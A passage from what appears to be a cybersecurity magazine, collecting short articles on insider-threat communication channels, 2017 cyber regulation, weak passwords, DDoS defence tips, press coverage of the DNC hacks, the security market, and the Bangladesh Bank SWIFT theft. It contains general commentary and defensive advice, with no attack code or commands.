classified as quite old-fashioned, because the majority of Police Forces are trained to
confirm that communication line.
In order to trick the authorities, the threats would use their private accounts and try to
appear as peaceful as possible at their work. Luckily, even those cases are resolvable
to the majority of Police Forces.
The Skype communication: The majority of critical information could leak out through
the Skype messenger. The insiders threat could use his private Skype account or add a
private contact to the Skype for a business. Its clear that during the working hours
being spent in the office the staff is obligated to get online in sense of the Skypes
communication, so its logical that the insiders threat would simply add the private
contact on. This scenario is well-known to the authorities, so its not that hard to resolve
such a case.
The Darknet communication: The professional threats would usually maintain their
communication and do information exchange using some of the Darknet systems. Its
not a rare case that the threat would create several Darknet accounts in order to make
the investigation being much harder to the authorities. Also, the security challenges
would use fake identities and so commonly share the information through Darknet e-
mails, chat services, forums, discussion groups and so on. We believe that modern
authorities can cope even with this scenario, because its something we would meet in a
practice so often.

The mobile technologies: In some cases, the threats would rely on mobile
technologies and use phone calls, text messages or web applications to exchange the
information. Anyway, they would leave a trace so, this case got a good perspective to
get resolved so far.
The hackers support: So commonly, the insiders threats would deal with the hackers
support. Its well-known that hackers could steal the information from any computer so
secretly, but sometimes they would need the assistance of people being inside the
organization. This scenario would begin as a usual phishing campaign and some of the
employees would click on the suspicious link and make the entire network getting visible
to the hackers.
In the majority of cases, the computers within a network would not have the valuable
data, so some of the local criminals would track the potential target and make a contact
in order to recruit that person to serve as an insiders threat. The todays hackers tools
would get a remote administration option, so the insiders threat would receive the
instructions directly on their screen either as a chat message or as skillfully prepared
file. This sort of scenario would also deal with the trace, so we believe that the modern
authorities could cope with such a case.
The meetings in person: Sometimes it can happen that the insiders threats would get
organized to meet in person with their criminal or terrorist contacts in order to talk to
them directly or provide them something being so valuable. This type of scenario could
also be discovered and proved for a reason the bad guys would carry on their cell
phones and leave some sort of the route that can be traced.
This article provides some of the typical cases being present in a modern criminology and
describes how those examples could get handled in a practice. We hope there would be more
research attempts that would try to investigate this topic deeper.
About The Author
Since Milica Djekic graduated at the Department of Control Engineering at

University of Belgrade, Serbia, shes been an engineer with a passion for
cryptography, cyber security, and wireless systems. Milica is a researcher
from Subotica, Serbia. She also serves as a Reviewer at the Journal of
Computer Sciences and Applications and.
She writes for American and Asia-Pacific security magazines. She is a volunteer with the
American corner of Subotica as well as a lecturer with the local engineering society.

Cybersecurity Regulations in 2017
The Enterprise View
By Tom Gilheany, Product Manager, Learning@Cisco
2016 was a big year in cybersecurity news and not in a good way.
The world experienced about 3,000 publicly disclosed data breaches in 2016. That exposed
about 2.2 billion records. Yahoo made headlines for experiencing the largest hack in history.
That has Verizon reconsidering its offer price for the search and media giant.
Distributed denial of service attacks illustrated the security risk involved with connected devices.
These attacks also demonstrated how the Internet of Things can be enlisted to be repurposed
for malicious use or taken over for ransomware, take remote control of connected devices or
exfiltrate data.
Ransomware became even more prevalent last year too. A Deloitte 2016 report indicated that in
the first quarter of last year alone there was an average of more than 4,000 attacks per day.
That was a 300 percent increase from the 1,000 ransomware attacks observed on average per
day in 2015. And then there was the U.S. presidential election. Cybersecurity, or the lack of it,
was center stage for that as well.
That included the hacking of the Democratic National Committee during the 2016 election
campaign. Then, in January, the Office of the Director of National Intelligence published a report
that said Russian President Vladimir Putin ordered an influence campaign in 2016 aimed at the
U.S. presidential election with a goal to undermine public faith in the U.S. democratic process,
denigrate Secretary Clinton, and harm her electability and potential presidency. This report
suggested the Russians did so using covert intelligence operations, including cyberactivity, in an
effort to impact election results.
Whatever you think of all that, the developments noted above make clear that our incoming
president and other politicians this year will be challenged by and likely pushed to respond to
the problem that is hacking.
Of course, cybersecurity already has been the subject of significant discussion in business,
government, and personal privacy circles.
Recent developments
During his administration, President Obama passed the Cybersecurity Act of 2015. That aimed
to create a framework for the voluntary sharing of cyberthreat information between private
entities and the federal government, as well as within agencies of the federal government.

In December 2016, a year after that law went into effect, the Obama administrations
Commission on Enhancing National Cybersecurity released its Report on Securing and
Growing the Digital Economy. It identifies cybersecurity gaps and how to address them.
But those problems and prescriptions are pretty general. For example, it talks about the need for
collaboration between the federal government and the private sector. It suggests the next
administration should develop concrete efforts to strengthen the cybersecurity of small and
medium-sized businesses.
Now the incoming administration has the opportunity to add some meat to these bones. And it
should probably start work on that sooner rather than later. Business leaders and their teams
should do the same.
Heres why.
Getting a head start on cyber
Forrester predicts that within 100 days the new U.S. president will face a major cybercrisis. In its
October 2016 paper 2017 Predictions: Dynamics That Will Shape The Future In The Age of the
Customer, the research and consulting firm also says that this year a Fortune 1000 company
will fail because of a cyberbreach. Ed Amoroso, AT&Ts recently retired chief security officer,
late last year offered a similarly dire prediction.
I believe that during the next presidential administration, we are going to see a massive
cyberattack on infrastructure, said Amoroso. I believe it is going to be of devastating
proportions, and I think we are not ready for it. Part of the problem is the lack of laws and
regulations on this front. But cyberattacks have become high visibility events. That, and the fact
that moving forward cybersecurity legislation could help politicians move forward their careers in
the process, indicates theres likely to be much more concrete action on the cybersecurity
regulatory front in the near future.
Cyber laws in 2017
Such laws are already in the works or have been enacted in Australia and Europe, as well as at
the state level in the U.S.
Australia has developed a national strategy through which government and the private sector
are working together to address cybersecurity. Last year it issued a white paper describing
major risks and initiatives on this front. And a few years ago it created the Australian Cyber
Security Centre, an initiative to make the countrys networks harder to compromise.
Last summer the European Union approved cybersecurity rules that

force businesses to strengthen their defenses. They require banking, energy, and major tech
companies to report attacks. And they talk about how EU nations must cooperate on network
security matters. Meanwhile, cybersecurity legislation was introduced or considered in at least
28 U.S. states last year. And 15 states enacted such laws in 2016, according to The National
Conference of State Legislatures.
Most of these laws and bills address national infrastructure and governmental agencies. But
some of these laws specifically target the interests of businesses. For example, one of the three
cybersecurity bills signed into law in California last year was S.B. 1137. It makes it a crime for a
person to knowingly introduce ransomware into any computer, computer system, or computer
network.
Colorados H.B. 1453 calls for the creation of a state cybersecurity council to provide policy
guidance to the governor. That council will also coordinate with the general assembly and the
judicial branch regarding cybersecurity. Utah H.B. 241, which the governor signed in March of
2016, enacts civil penalties for hackers. And Washington states H.B. 2375, which the governor
signed in April of 2016, establishes the State Cybercrime Act.
Looking ahead
Of course, the incoming presidential administration in the U.S. is not expected to be heavy
handed with regulations. However, the high-profile subject of cybersecurity could be the
exception. That said, organizations with a stake in cybersecurity and related regulations
which is to say most organizations need to be ready for whats happening on that front.
Businesses that arent already involved in the cybersecurity discussion may want to start voicing
their opinions and offering a hand on these efforts now, before cybersecurity regulatory
decisions are cemented.
At the same time, businesses should keep in mind that regulations typically lag technology by
three to four years. That means businesses need to go beyond simply complying with
cybersecurity regulations. They need take additional steps to ensure their organizations are as
secure as their risk assessments suggest they need to be.
About Tom Gilheany
Tom Gilheany is Ciscos Product Manager for Security Training and

Certifications. He has a diverse background in startups through
multinational Fortune 100 companies. Combining over 20 years of product
management and technical marketing positions, and over a dozen years in
IT and Operations, he has conducted nearly 50 product launches in
emerging technologies, cybersecurity, and telecommunications. Tom holds
a CISSP, an MBA, and is an active board member of the Silicon Valley
Product Management Association and Product Camp Silicon Valley.

Password security: It's like sellotaping your house key to the
front door...
by Jonathan Stock, Cyber Security Recruitment Consultant, IntaPeople.
Last month we saw Barack Obamas final mic drop as President, Kim Kardashian's finally stable
and secure enough to get back into her social network game, and theres enjoyment all around
our office over the first instalment of the TV series Spies, watching people dropped into a
cybersecurity seminar come up with backstories as to why they were there and who they were.
Yet the same stories keep popping up within the cybersecurity industry.
On the radio this morning I heard another advert promoting individuals to be cyber aware; to be
concerned of malware, to not bow down to ransomware attacks. Great news, everyone is taking
notice of cybersecurity.
The industries mission to educate everyone is taking shape. And then, I read an article this
morning about the most common passwords of 2016, and of course, theres some massive
issues.
Can you guess what the most used password was for 2016? The one used by nearly 1 in 5
people? The same one as 2015. 123456. Thats right, 123456. Hello face, here's my palm!
Then theres the rest of them; QWERTY, 111111, password; the list goes on in a similar vein
(my favourite of all of them was google).
It amazed me that in this day and age, when we are bombarded with news articles about
hackers stealing your personal data that theres still not a greater effort by individuals to make
themselves as secure as possible.

As mentioned within the article, the whole fault cant be put at the feet of the individual, but the
websites involved should also be accountable. Their responsibility is to make it as difficult as
possible for hackers to access their data.
They can make their infrastructure more robust, their defences better to deal with attacks but
they should also enforce more complex password policies. Yes the companies involved in data
breaches are held accountable.
They are fined, exposed in the media and soon, when GDPR pops up, they are going to be
regulated more and more.
Surely it would be better for all companies to enforce strong password best practice, then, if
hackers do get in, maybe it would be slightly more difficult for them to get into customer
accounts.
We hear all the time that hacks are getting easier and easier, that they can attack multiple
companies at once and more sensitive data is being breached.
Its easy to change your password to something trickier, to change it regularly on a monthly
basis, all it takes is the desire to do so. I cant see it being very difficult to change password to
PaS5w0rD!&* and once you have done the password 10 times, you are going to remember it.
Ultimately, a slight change makes things harder for hackers, keeps you more secure and helps
you to become more cyber aware.
Its been said many times before that cybersecurity is a combination of products and processes.
You can have the best firewalls, the best anti-virus software but if you are not committing to the
processes and best practices, then ultimately, you are going to be found out and those pesky
little hackers are going to get in.
About The Author
My Name is the Jonathan Stock and I am a cybersecurity recruitment

consultant working for IntaPeople. In addition to sourcing candidates for various
cybersecurity companies,
I am also a contributor to several cybersecurity online magazines, a member of

the UK Cyber Security Cluster and an event coordinator.
Jonathan can be reached online at j.stock@intapeople.com, @JonathanStock86 and at our

company website http://www.intapeople.com

14 Unique Ways to Protect Yourself from DDoS Attacks
by Todd Reagor, CEO of Rivalhost
If your website goes down due to an overload of website traffic, youre probably a victim of the
notorious distributed denial of service (DDoS) attack. DDoS attacks have become a nightmare
for companies with an active online presence. From BBC to Twitter and from Donald Trumps
website to Netflix, 2016 saw some of the most unprecedented cyber attacks in the history of the
internet.
DDoS attacks have become a nightmare for companies with an active online presence. From
BBC to Twitter and from Donald Trumps website to Netflix, 2016 saw some of the most
unprecedented cyber attacks in the history of the internet.
In the ever-changing world of high-tech gadgets and rising popularity of Internet of Things,
DDoS attacks have increased 2.5 times over the last 3 years, and are believed to become
increasingly frequent in the coming years.
Furthermore, according to a report by Cisco in 2016, the average size of DDoS is accelerating
and approaching 1Gbps, which is enough to bring large business offline. Globally, the DDoS
attacks grew by 25% in 2015 and are likely to increase by 260% by 2020.
From monetary to brand value, DDoS attacks drastically affect every part of the business. The
cost a business can incur from a DDoS attack range up to $20,000 and for airline Virgin Blue
lost $20 million in an IT outage that lasted for 11 days in 2010.
Today, businesses need to tighten their seat belts to work and land safely in the highly
advanced internet world. Here are 15 unique ways to protect yourself from DDoS attacks.
1. Create an Action Plan in Advance
Why wait for a DDoS attack to ruin your business? Intelligence is in responding to the potential
attacks before they happen.
Focus on creating a system that absorbs a potential DDoS attack. Though creating an action
plan in advance is not 100% foolproof way of DDoS protection, it does help in mitigating the risk
to a great extent.
An action plan might consist of the following items:
Use sensors that send an alert whenever the website is down.

In case of any malicious activity, dump the logs quickly.
Consider contacting your ISP to understand about the free and paid DDoS protection
plans.
Confirm the DNS TTL (time-to-live) for systems that can be attacked in the future.
Document your IT infrastructure and create a network topology diagram with an asset
inventory.
Purchase DDoS protection products to mitigate the monetary loss due to the attacks.
An action plan comes in handy when your website is under attack because it would reduce the
extent of damage caused by the hackers.
2. Monitor Traffic Levels
A DDoS attack brings an unprecedented amount of traffic to your server, which spikes the traffic
beyond your imagination.
In fact, an ideal time for any hacker to strike is when your website is likely to witness huge
amount of traffic such as Thanksgiving or Christmas. They mix with the genuine traffic and
overloads the server with unprecedented traffic, which eventually crashes the server.
Therefore, the best way to quickly notice a DDoS attack is to look out for abnormal traffic
increase to your website. If you expect 500 visitors per 10 minutes, an influx of 4000 visitors per
minute should trigger an alert.
Staying alert, monitoring the traffic and setting threshold limits when traffic goes beyond a
certain level will help you in DDoS protection.
3. Pay Attention to Connected Devices
Internet of things is the latest buzz and a growing topic of conversation both in the workplace
and outside. From wearables to retail, healthcare to agriculture, IoT is making an impact in
every sector, but even this burgeoning technology is not spared by attackers.
Hackers find their way through these connected devices to disrupt the services of a brand.
Paying special attention of the connected devices will help you wade through the DDoS attack.
For stronger DDoS protection, change the passwords of the devices regularly, switch off the
devices when not in use and verify every device before connecting it.
Until the procession begins, focus on mitigating the threats to protect the connected device and
your server.

4. Ensure You Have Extra Bandwidth
It makes sense to have more bandwidth than you would plausibly need because
overprovisioning your bandwidth provides extra time to identify and deal with the attack.
It also enables the server to accommodate unprecedented spikes in traffic and to some extent
lowers the intensity of the attack.
If you overprovision the bandwidth by 200 percent or 600 percent, it will not stop the DDoS
attack, but it will buy you crucial time before your resources are overwhelmed.
Therefore, when determining the requirement of bandwidth give your business a healthy margin
of error to mitigate the risk of cyberattacks.
5. Train Your Customers On Security
An informed and a trained customer is an asset to your business as they walk with you hand-in-
hand for higher DDoS protection.
Explain to the customers the necessity and dire need of safeguarding their systems because
hackers target computers with weak passwords.
Gone are those days when birthdate or family name was considered as a strong password for a
computer. Urge your customers to keep difficult passwords to protect their privacy.
Furthermore, educate the clients to skip any attachments received from email addresses they
dont recognize.
Today, customer education is an essential component of any companys strategy for DDoS
protection. To proactively guard the customers against such cyber bullies, encourage them to
review and follow best practices to secure their device.
6. Set up Secured VPS Hosting
In order to save a few dollars, many businesses opt for the lowest price hosting plans available
in the market. While the initial cost is low, the threat of DDoS is attack is outrageous. Setting up
a secured VPS hosting provides DDoS protection and reduces the probability of an attack.
With a secured VPS, your website has its own portioned space, unique IP address and
operating system, thereby isolating the site from cyberattacks.

Furthermore, secured VPS hosting provides full access to console, which helps in eliminating
the potential malware.
In short, DDoS secured VPS hosting takes away the headache and makes use of the latest
technology to put your website in the driving seat.
7. Drop Packets from Obvious Sources of Attack
DDoS attacks have the potential to create a havoc on your business and you need to stop traffic
from false sources at any cost. Focus on using the access list at the perimeter of network to
prevent malicious activities. Furthermore, instruct the router to drop packets from IPs that are
obvious sources of attack. You can also rate limit your router to add another layer of protection.
Again, with the increasing size of online attack, this strategy will only buy time and delay the
ramping up of the threat.
8. Purchase a Dedicated Server
Purchasing a dedicated hosting server will provide you with more bandwidth, control over
security, and countless resources. With a dedicated server as your first layer of defense, you
can successfully run your online site with thousands of legitimate customers without worrying
about anything. Undoubtedly, dedicated servers are expensive, but the benefits clearly outweigh
any monetary issue you face due to lack of DDoS protection.
Our DDoS protected dedicated servers provide DDoS protection of 20 Gbps with a bandwidth of
10 terabytes. We manage 100% of the server operation, giving you room to focus on other
important business aspects.
9. Block Spoofed IP Addresses
Things are not always what they seem; the first appearance deceives many.
-Phaedrus
These words hold true, especially for IP address spoofing. For those of you who are new to the
word spoofing in simple English, it means presenting the wrong facts in a decorated
manner. Prevention of IP address forgery leads to harmful DDoS attack and you need to focus
on the following tips to stop IP address spoofing.
Create an access control list (ACL) to deny all inbound traffic with a particular source IP.
Focus on using reverse path forwarding (RPF) or IP verify. It works similar to an anti-
spam solution.
Filter both outbound and inbound traffic to enhance DDoS protection.
Change the configuration of your switches and routers such that they automatically
reject packets coming from outside your network.
Focus on encrypting different sessions on your router to allow trusted hosts who are
outside your network.
10. Install Patches and Updates Frequently
Installing updates on open source platforms like WordPress as soon as possible mitigates the
risk of attack because the potential security loophole is filled with an update. Therefore, deploy
an update within your network as soon as possible.
The longer the lag time between the update and the application, the more vulnerable your
system becomes.
This is often neglected by many businesses, mainly because of the frequency of updates and
they consider it irrelevant to update the application.
11. Aggressively Monitor Half-Open Connections
In a usually three-way handshake:
The client request connection by sending SYN (synchronize) packet to the server,
The server returns the SYN-ACK (synchronize-acknowledge) packet to the client,
The client answers with an ACK (Acknowledge) that the package is received and
communication begins.
In half-open connections, the packets are not sent to the hostile client. However, the client
sends multiple requests to the server ports using fake IP addresses. Such a connection is not
closed and remains open making it vulnerable to attack.
Detection of such half-open connections is done by:
Adding an empty keepalive message to the application protocol framing

Adding a null keepalive message to the actual application protocol framing
Using an explicit timer
Altering the TCP keepalive settings

12. Use Proxy Protection
Proxy protection provides an extra layer of DDoS protection for any website and keeps your
website safe from complex cyber threats. Our remote DDoS proxy protection hides your real IP
from hackers and sends proxy traffic through their mitigation network. The best part is that the
entire process occurs without the visitors realizing it. Furthermore, remote proxy protection
increases the security and performance of HTTP applications. Its a must for any business
looking to create an impact in the online world.
13. Set up RST Cookies
RST cookies are a strong defense against the DDoS because the server sends incorrect ACK +
SYN to the client and then the client forwards a packet telling the server about the potential
error. Therefore, it prevents the business from potential attack.
14. Filter UDP Traffic With Remote Black Holing
Filtering the UDP traffic with remote black holing can effectively stop undesirable traffic to enter
a protected network. These remote black holes are areas where the traffic is forwarded and
then dropped. And, when an attack is detected it drops all the traffic based on the IP address
and the destination. Here are the three steps to set it up:
Prepare a null route

Prepare a route map
Generate a victim route on the management router
Learn more about the various types of DDoS attacks and contact us to see which type of
hosting is right for you.
About The Author
Todd Reagor is the Founder and CEO of RivalHost. He is the only employee
as his support team is outsourced. Todd lives in Edmond Oklahoma with
family.
Todd can be reached online at todd@rivalhost.com, and at our company

website: https://www.rivalhost.com/

DNC, Clinton campaign hacks highlight need for journalists to
move past content and focus on how easily it was stolen
By Andrew Conte, director of the Center for Media Innovation at Pittsburghs Point Park
University, and Brian Nussbaum, assistant professor of Homeland Security and Cyber Security at
the University of Albany, SUNY
The U.S. intelligence community recently released substantial documentation of both the
forensic investigation around the hacking of the Democratic National Committee, as well as
broader influence operations through hacks of officials such as Clinton campaign chairman John
Podesta and the use of false and manufactured stories on social media. Russias civilian and
military intelligence services have been identified as the source of this information and attacks.
Yet, until national intelligence officials released these details, news stories focused almost
exclusively on the contents of the pilfered messages rather than how easily such sensitive
materials were stolen.
According to the United States intelligence community, the focus on those contents appears to
have been the goal of a broad information operation by the Russian state designed to have
political effects in the American electoral system.
This is arguably the largest cybersecurity story since Stuxnet; but for most of it, the focus was
on the trees rather than the forest.
As the pace and size of online theft grows exponentially, reporters must keep up even though
its yet another added challenge to a media industry already under assault from cutbacks and
falling advertising revenues.
Certainly, many news outlets are aware of this need. The coverage of cybersecurity issues has
not only been deeper as of late, but broader as well.
Reporters at major national newspapers such as Ellen Nakashima at The Washington Post
and Nicole Perlroth at The New York Times have offered continuous streams of reporting
across aspects of cybersecurity.
Other national papers have introduced new sections, such as the Christian Science Monitors
Passcode, to focus on these issues. Large national news magazines Wired, Forbes, and
Bloomberg Businessweek consistently have offered excellent coverage of cybersecurity
issues.

While these large national newspapers and news magazines perform well, perhaps the more
interesting story comes in the form of the other sorts of news outlets that have been thriving
alongside these well-known outlets.
Smaller regional newspapers have been providing excellent coverage of cybersecurity issues;
this despite the fact that these are the papers that are supposed to be experiencing the worst of
the cutbacks.
The San Diego Union Tribune, based in a city with important technology industries, been
reporting extensively and effectively on cybersecurity issues at a level that is disproportionate to
their size.
While many smaller papers may have decreased their state capital coverage or become more
reliant on wire services, these papers show that institutional focus on an issue like cybersecurity
can translate into important news coverage.
There is increasingly an ecosystem of often mutually reinforcing new voices and institutions that
are making the coverage of cybersecurity issues ever more exciting, too. Nonprofit journalism
organizations such as ProPublica, whose Julia Angwin has been doing excellent work on
surveillance have come to play an important role.
New media organizations such as Vice, through its Motherboard digital news portal, and Ars
Technica have become go-to sources for news from the digital battlefield.
Even traditional magazines that dont focus on national news, but on more narrow topics, have
thrived on this issue. For example, Consumer Reports has produced impressive work on how
individuals can improve their privacy from tracking by governments and corporations alike.
Finally, even lone journalists the archetype of whom in the cyber world is Brian Krebs have
leveraged the web as a forum from which to continue conducting investigative journalism on
cybersecurity topics.
Krebs, operating on his own, often is the first to report major breaches, and he frequently ends
up alone facing threats from hackers upset by his reporting.
Despite all of these advances, reporters face the challenge of trying to keep up with a rapidly
changing field as technology grows and criminals exploit new ways of stealing information,
secrets and money.
Too often, reporters show little understanding for the depths of the secret internet or the
intricacies of how hacking works.
These are complicated issues even for the experts. Behind closed doors at government
agencies, at major corporations and at a growing number of cyber-safety-focused nonprofits,
executives and leaders struggle to understand the evolving scope of threats.

Too frequently these same leaders see journalists and media coverage as another challenge to
be avoided; either because reporters reveal vulnerabilities or defense strategies, or because
they increase the impact of attacks by endlessly reporting on them.
As recent incidents show, journalists need to be more vigilant by digging deeper and taking the
time to understand the nuances of computer security and the potential impact of cyberattacks.
And to do this, they will need the trust and help of computer experts.
Without a greater focus on the dangers, journalists could find themselves manipulated, putting
the public at risk.
About the Authors
Andrew Conte:
Andrew Conte serves as the founding director of Point Park Universitys
Center for Media Innovation. He also is a contributing writer at the Pittsburgh
Tribune-Review and a best-selling nonfiction author. Andrews latest book, All
About Roberto Clemente, tells the story of the Pirates outfielder and Puerto
Rican native. Its written for advanced elementary and middle school readers.
Previously, Andrew wrote The Color of Sundays, which explores the role of
race in the National Football League and how the Pittsburgh Steelers used the
leagues prejudice to the teams advantage. He also authored the best-selling
sports book Breakaway, which was re-released in paperback in the fall of
2016 with a new chapter on the Penguins hockey teams latest Stanley Cup championship.
Andrew is a graduate of Columbia Universitys Graduate School of Journalism and Dickinson
College.
Brian Nussbaum:
Dr. Brian Nussbaum is an assistant professor in the Department of Public
Administration and Policy. His focus is on cybersecurity and cyber threats,
terrorism and terrorism analysis, homeland security, risk and intelligence
analysis, and critical infrastructure protection. He also serves as an Affiliate
Scholar with the Center for Internet and Society (CIS) at Stanford Law
School, and as a Senior Fellow with the Center for Cyber and Homeland
Security (CCHS) at George Washington University. Dr. Nussbaum formerly
served as senior intelligence analyst with the New York State Office of
Counter Terrorism (OCT), a part of the New York State Division of Homeland
Security and Emergency Services (DHSES). He oversaw both terrorism and cyber threat
analysis efforts at New York's designated state fusion center, the New York State Intelligence
Center (NYSIC)

THE GLOBAL CYBER SECURITY BATTLE
LAPTOPS WILL BE THE ARTILLERY OF THE FUTURE
by David J. OReilly, Managing Director, Hampton Court Capital
Every political and military conflict now has a cyber security aspect to it, which has led to
governments treating the build up of highly advanced defences in this area with the same
importance as they would the acquisition of a new aircraft carrier or fleet of warships or jet
fighters.
In the UK, we have seen the recent formal opening of a National Cyber Security Centre (NCSC)
by the Queen this month, where GCHQ staff will work closely with the best and the brightest
private sector experts to help identify and counter cyber security threats against UK assets.
A perfect storm of events and developments are driving exponential growth in the Cyber
Security sector globally: the growing rise of cyber attacks and the proliferation of new malware
technology such as ransomware, as well as the widespread use of multiple devices as part of
the internet of things such as intelligent domestic appliances and mobile devices.
Gartner estimate that worldwide IT security spending will more than double from $77 billion in
2015 to $170 billion by 2020.
Investors are eagerly deploying capital into new companies in the cyber security sector, many of
which make use of artificial intelligence and machine learning to grapple with the epic task of
interpreting and responding to the truly mammoth volume of data that spews forth from servers
and networks globally each second.
Small to medium sized companies often think that because high profile cyber security news
stories usually refer to governments or large global companies being hacked, such as the US
election hacking rumours or the well documented attack on TalkTalk here in the UK, they do not
need to worry as they are too small to be a worthwhile target nothing could be further from the
truth.
Cyber attacks are not someone elses problem they are your problem and they need to be
viewed as a potential spear in your side that is tackled head on and skillfully deflected, not as a
gaping wound that is stitched up and patched over after the attack.
Regardless of the size of your company, household, government department, hospital,

university or police force, you are a potential target and you need to mitigate the risks.
Ransomware was the biggest growing malware variant in 2016, and it represents a highly
disturbing evolution in the cyber security landscape that should make everyone, from
households to the largest international companies and government agencies, sit up and take
note. This is malicious software that blocks access to a computer until you pay to fix it.

Black market prices have fallen for large batches of personal data such as addresses and credit
card numbers, forcing malevolent individuals to switch their attention onto extorting money from
personal victims.
The bulk of these attacks are through malicious email attachments, and the ingenuity and skill
involved by the hackers to extort money is truly breath taking.
The risks have never been as severe: there were 188 cyber attacks classed by the NCSC as
Category 2 or 3 during the last three months, although the UK has not yet experienced a
Category 1 attack, the highest level (for example, the attack on the US Office Of Personnel
Management was a Category 1 attack, with millions of confidential American public service
personnel records stolen).
Hackers managed to steal $81 million from the Bangladesh Central Bank according to media
reports in 2016, promoting others to upgrade their security, but I am still not convinced that C-
suite teams understand that cyber security permeates every aspect of a companys DNA and is
the responsibility of every individual, not just the IT department.
I fear that hacks, cyber attacks and digital heists similar to the experience of the unfortunate
Bangladesh Central Bank will increase in coming years and become an increasingly common
occurrence.
Threats such as ransomware will be even more dangerous due to the number of interconnected
devices and smart phones in our homes and offices.
The internet of things may well end up being re-named the internet of weaknesses or the
internet of vulnerabilities.
Quite often, the biggest threat comes from inside a business, where poor internal controls and
dangerous internal practices are dangerous Achilles heels for many companies.
For example, a study of leaked passwords last year that analyzed 10 million leaked passwords
found that 17% of accounts sampled were secured with the password 123456.
This all goes to demonstrate how much IT security is a make or break business issue
traditionally, companies, government departments and security agencies have treated this area
as a matter for their IT department. It requires a leader who reports directly to a senior
executive, if not to the board directly itself.
The specific job title of this individual is not important, but rather their ability to bring key IT
security issues to the C-suite directly with clarity, authority and sufficient gravitas to help the
management team think through and discuss how security affects every single business
decision.
Effective cyber security leaders are those who can demonstrate the linkages between security
and the companys strategic objectives and goals.

They are effective at reminding the rest of the management team that cyber security is a
strategic matter, not an IT department matter.
The most successful companies of the future will be those who invest in cyber security systems
and in the right experts, both internal staff and external consultants and cyber security
specialists, who are able to effectively detect, analyse and resolve a vast plateau of international
cyber security threats in real time using cutting-edge systems.
Companies are increasingly making use of cutting-edge cyber security products and advice on a
managed security services basis, with the result being that this market is expected to be worth
$34 billion by 2021 according to Markets And Markets research.
The key to success will be the ability to proactively plan for attacks and detect them as they
occur.
Companies and government agencies need to be able to move from a situation calm status to
an initial alert status to an attack defeated / matter resolved status in a matter of seconds or
minutes (not hours, days or weeks) in todays environment.
By catching an incident early, security teams can reduce the overall impact (costly fixes, threats
to human life and to property, disrupted business, reputational damage, stolen IP, financial
loss).
For governments, this approach will be vital when it comes to protecting their citizens cyber
security is no longer a matter of protecting merely a few servers with some personal details, but
it is a matter of, quite often, life and death, and of national security, with critical pieces of
national infrastructure frequently being discreetly measured up and assessed by those who
would do us harm, such as energy grids, hospital networks, educational institutions, government
departments, water systems, gas/oil pipelines, air traffic control networks and nuclear facilities.
About The Author
David OReilly is a Managing Director at Hampton Court Capital, an award

winning international TMT (Technology, Media and Telecoms) Boutique
Investment Bank based in London, and a senior board advisor and non-
executive director to several charities, non-profit discussion forums and
privately owned TMT companies. He is head of the UK alumni chapter for
University College Dublin.
David can be reached online at david.oreilly@hamptoncourtcapital.com

and at his company website http://www.hamptoncourtcapital.com/.

A Look Into Cyber Security
Cyber security is a top priority for organizations to keep their information and systems safe from
theft, damages, or disruptions. Find out how the enemy works, ways to defend your organization
from an attack, what hackers are capable of, and more.
By Matthew Stockham, GTreasury
Network security in cyberspace is never far from the headlines. When it does reach the
headlines, its never good news.
Here are just a few famous or infamous - security breaches of the not-too-distant past, even
though they might seem like ancient history by now: Target, Adobe, TJX, Home Depot, Sony
Playstation, Heartland, Epsilon.
Hackers and cyber-thieves are, unfortunately, good at what they do and getting more
sophisticated all the time. They take advantage of gaps and weak spots in information
technology systems. But those gaps and weak spots are there, almost exclusively, because
some human being wasnt doing his or her job properly.
We can always improve our hardware and software, and well discuss a few ways were doing
that. But it doesnt matter how powerful or expensive your system is if you dont know how to
use it.
Outdated Technology and Human Error

SWIFT is a messaging system used by banks and financial companies. SWIFT messages
include, but are not limited to, payment orders. The SWIFT network itself was not hacked. But
the hackers, operating from Egypt, penetrated the banks systems and installed malware. The
malware modified the banks Alliance Access software, which reads and writes the SWIFT
messages and records transactions.
The malware altered payment orders, increasing transaction amounts and changing payment
destinations. It also changed the SWIFT payment confirmation messages back to the original
amounts or deleted them entirely.
A police investigation showed that the Bangladesh Bank had no firewalls and was using
second-hand, ten-dollar switches on its network. The Philippine bank was using a $25 router
and default passwords. Its little wonder that the crooks were able to get into the networks.
Anyone who takes security seriously knows that security demands investment. You cant expect
good results by picking cheap components off the shelf, plugging them in, and hoping theyll
work. The components need to be part of a coherent plan.

How The Enemy Works
Spam. Spear phishing. Social engineering. Confederates inside the target institutions. Black-
hat tool kits that are more advanced than the tools that developers work with when building
applications. Theyre all part of the arsenal that hackers use.
Nowadays we dont hear much from the deposed African prince who wants to split a hundred
million bucks with us. Cyber crime has gone way beyond such stickups of unwary individuals.
The cyber criminals are working full time and studying your business. They scan for the open
port, look for SSL vulnerabilities, do automated testing. They seek out the one vulnerable
machine on the network or the one gullible or inattentive person who clicks on a link and lets
malware in.
They also learn who does your payroll, whether you use FedEx, whos your ISP. Theyll send
you an invoice that says your account is overdue and youll be terminated if you dont reply.
People click on the invoice link, which can look like a pdf file but which masks an executable
one, without thinking. Even high-credentialed employees like executives, CFOs, and treasurers
get duped. Theyre in a hurry, and they click on links without thinking.
All the hackers need for a response rate is for one percent of their attempts to succeed, but the
percentage of the population that falls for it is much higher than that.
More than 80% of malware that reaches its target gets distributed by phishing, or by
somebodys clicking a link on a compromised web site. This campaign highlights the fact that
organizations are only as strong as their weakest link, and in this case, its their employees.
IBMs 2015 Cyber Security Intelligence Index indicated 95 percent of all attacks involve some
type of human error.
Attackers rely on that factor, counting on someone to open a fraudulent attachment or link.
Wordpress sites are a particular problem. Many people who use Wordpress do it as a hobby,
not in their full time jobs. They dont keep security patches up-to-date. So if some hacker
compromises a Wordpress site and adds their own code, and then you click on one of the sites
links behind the scenes theres a software download to your machine.
Defending Your Castle

Think of your business as a castle. Build the walls and dig the moat. Most attackers are looking
for the soft spots and easy pickings they prefer to probe for open doors to your system, and to
simply walk in. You can turn these intrusion attempts aside by having those walls and moat -
appropriate policies and components in place.
The drawbridge and the great wooden door are the entryway to the castle. Sometimes that door
must be opened, or the castle cant function in the world outside. The door should open only
when needed. No other entryways, such as windows or emergency doors, should be left
unlocked.

When the door is opened, be sure you have vigilant, armed, well-trained sentries on duty.
Theyll protect you from almost every other external threat the attackers who go beyond
casual probing to methodical intrusion attempts.
With the above measures in place, youll be guarding against about 99% of all forays against
your system.
Finally, station hundreds of vigilant guards atop the castle walls and around the base of the
walls. Theyll spot and dispatch the final one percent of attackers, those lone daredevils who try
to scale the walls or tunnel beneath them.
To summarize - the walls and the moat are administrator rights to your system. More precisely,
